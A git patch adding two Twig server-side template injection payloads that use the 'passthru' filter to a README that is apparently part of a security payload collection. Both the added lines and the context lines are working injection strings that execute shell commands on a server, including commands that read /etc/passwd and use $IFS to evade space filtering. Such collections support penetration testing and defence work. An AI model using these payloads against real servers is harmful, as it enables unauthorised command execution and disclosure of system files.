From c1dc141e13f76f0a6b8ba2866e2263b3aebbbb82 Mon Sep 17 00:00:00 2001
From: Tom Wilford
Date: Fri, 28 Apr 2023 14:47:59 +0100
Subject: [PATCH] Added 'passthru' filter exploits

---
 Server Side Template Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index a0913f0..5c9fe14 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -966,6 +966,8 @@ $output = $twig > render (
 {{['id',1]|sort('system')|join}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id']|filter('passthru')}}
+{{['id']|map('passthru')}}
 ```
 
 Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)